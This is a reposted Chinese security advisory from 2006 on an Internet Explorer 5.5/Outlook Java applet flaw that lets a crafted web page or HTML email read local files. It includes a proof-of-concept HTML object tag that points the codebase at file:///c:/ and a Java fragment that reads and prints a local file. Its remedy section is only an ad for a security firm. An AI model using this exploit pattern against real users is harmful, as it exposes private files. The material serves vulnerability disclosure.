IE5.5/Outlookjava存在安全漏洞
|
|
|
作者:爱心 来源:爱心 加入时间:2006年02月18日 |
| |
IE5.5/Outlookjava存在安全漏洞
站点:爱心种子小博士 关键字:IE5.5/Outlookjava存
|
IE 5.5/Outlook java存在安全漏洞
涉及程序:
IE 5.5/Outlook
描述:
IE 5.5/Outlook java存在安全漏洞
详细:
一个攻击者能通过一个指定的Java applet代码库,然后通过HTML邮件或网站提交给目标主机
能获得在远程系统上的读取权限。当用户在使用Microsoft Internet Explorer
或Outlook/Outlook Express时,与一个jar文件相关联的applet程序运行。这样一个恶意
的攻击者可以通过诱惑用户访问他自己创建的网页或HTML文件来打开用户的电子邮件或是了解到
用户的URL。这样可以获得用户的敏感信息。
以下代码仅仅用来测试和研究这个漏洞,如果您将其用于不正当的途径请后果自负
javacodebase1.html
<OBJECT CLASSID="JAVA:gjavacodebase.class" WIDTH=590>
<PARAM NAME="ARCHIVE" VALUE="http://www.guninski.com/gjavacodebase.jar">
<PARAM NAME="CODEBASE" VALUE="file:///c:/">
<PARAM NAME="URL" VALUE="file:///c:/test.txt">
</OBJECT>
gjavacodebase.java
......
try
{
u = new URL(getParameter("URL"));
InputStream is=u.openStream();
byte ba[]=new byte[1000];
int l=is.read(ba);
InputStream os=u.openConnection().getInputStream();
String s1=new String(ba,0,l);
print(u.toString());
print(s1);
}
.......
受影响的系统:
Microsoft Windows 98
Microsoft Windows 95
Microsoft Windows NT 4.0
Microsoft Windows NT 2000
解决方案:
CNNS为您提供完善的网络安全服务。
|
|
|
|
|
|
